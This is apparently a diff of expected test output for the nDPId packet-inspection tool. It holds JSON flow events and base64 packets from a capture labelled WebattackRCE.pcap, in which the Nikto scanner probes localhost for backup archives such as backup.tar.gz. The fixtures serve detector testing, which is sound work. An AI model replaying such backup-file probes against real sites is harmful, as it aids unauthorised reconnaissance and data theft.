-01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277232,"pkt":"AAAAAAAAAAAAAAAACABFAADB9\/xAAEAGRDh\/AAABfwAAAcRGH5CWhs9n6ph7xIAYAED+tQAAAQEICp1m\/RidZv0YR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277233,"pkt":"AAAAAAAAAAAAAAAACABFAADB+aZAAEAGQo5\/AAABfwAAAcRIH5BuH8E5NSGMTIAYAED+tQAAAQEICp1m\/RmdZv0ZR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277235,"pkt":"AAAAAAAAAAAAAAAACABFAADF6elAAEAGUkd\/AAABfwAAAcRKH5Ao6tF83Ul6FYAYAED+uQAAAQEICp1m\/RudZv0aR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277236,"pkt":"AAAAAAAAAAAAAAAACABFAADFYRdAAEAG2xl\/AAABfwAAAcRMH5CsR1mJC42rtYAYAED+uQAAAQEICp1m\/RydZv0cR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277237,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/lsZAAEAGpXB\/AAABfwAAAcROH5CjIq5axoK2IoAYAED+swAAAQEICp1m\/R2dZv0dR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277239,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HMpAAEAGH21\/AAABfwAAAcRQH5BQEyRWh8Tqd4AYAED+swAAAQEICp1m\/R+dZv0eR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277240,"pkt":"AAAAAAAAAAAAAAAACABFAADGqKRAAEAGk4t\/AAABfwAAAcRSH5A2yZA9R5wqAoAYAED+ugAAAQEICp1m\/SCdZv0gR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 